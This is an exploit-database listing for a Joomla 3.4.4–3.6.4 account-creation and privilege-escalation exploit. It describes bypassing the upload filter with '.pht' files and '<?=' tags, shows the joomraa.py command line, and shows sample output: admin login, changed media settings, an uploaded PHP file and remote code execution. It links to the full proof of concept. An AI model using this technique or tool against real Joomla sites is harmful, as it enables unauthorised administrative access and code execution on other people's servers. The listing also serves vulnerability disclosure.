Joomla 3.4.4 - 3.6.4 - Account Creation / Privilege Escalation Exploit

2016-10-2700:00:00

Xiphos Research

0day.today

295

0.929 High

EPSS

Percentile

99.1%

JSON

Exploit for php platform in category web applications

Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa
 
While analysing the recent Joomla exploit in com_users:user.register we came across a problem with the upload whitelisting. They don't allow files containing <?php, or with the extensions .php and .phtml, but they do allow <?= and .pht files, which works out of the box on most hosting environments, including the standard Ubuntu LAMP install, as per:
 
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
Usage
 
Choose the username, password and e-mail address to use and point it at the URL for your Joomla website. Use the -x and -s options to customise exploit behaviour, -s searches for the given string in the output after running the PHP file (specified in -x), an example is provided which proves remote code execution.
 
$ ./joomraa.py -u hacker -p password -e [email protected] http://localhost:8080/joomla 
 
     @@@   @@@@@@    @@@@@@   @@@@@@@@@@   @@@@@@@    @@@@@@    @@@@@@   @@@  
     @@@  @@@@@@@@  @@@@@@@@  @@@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@  
     @@!  @@!  @@@  @@!  @@@  @@! @@! @@!  @@!  @@@  @@!  @@@  @@!  @@@  @@!  
     [email protected]!  [email protected]!  @[email protected]  [email protected]!  @[email protected]  [email protected]! [email protected]! [email protected]!  [email protected]!  @[email protected]  [email protected]!  @[email protected]  [email protected]!  @[email protected]  [email protected]   
     [email protected]  @[email protected]  [email protected]!  @[email protected]  [email protected]!  @!! [email protected] @[email protected]  @[email protected][email protected]!   @[email protected][email protected][email protected]!  @[email protected][email protected][email protected]!  @[email protected]  
     !!!  [email protected]!  !!!  [email protected]!  !!!  [email protected]!   ! [email protected]!  [email protected][email protected]!    [email protected]!!!!  [email protected]!!!!  !!!  
     !!:  !!:  !!!  !!:  !!!  !!:     !!:  !!: :!!   !!:  !!!  !!:  !!!       
!!:  :!:  :!:  !:!  :!:  !:!  :!:     :!:  :!:  !:!  :!:  !:!  :!:  !:!  :!:  
::: : ::  ::::: ::  ::::: ::  :::     ::   ::   :::  ::   :::  ::   :::   ::  
 : :::     : :  :    : :  :    :      :     :   : :   :   : :   :   : :  :::  
 
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht
[*] Calling exploit
[$] Exploit Successful!
[*] SUCCESS: http://localhost:8080/joomla
 
 
Full Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40637.zip

#  0day.today [2018-04-06]  #

0.929 High

EPSS

Percentile

99.1%

JSON

Related for 1337DAY-ID-26152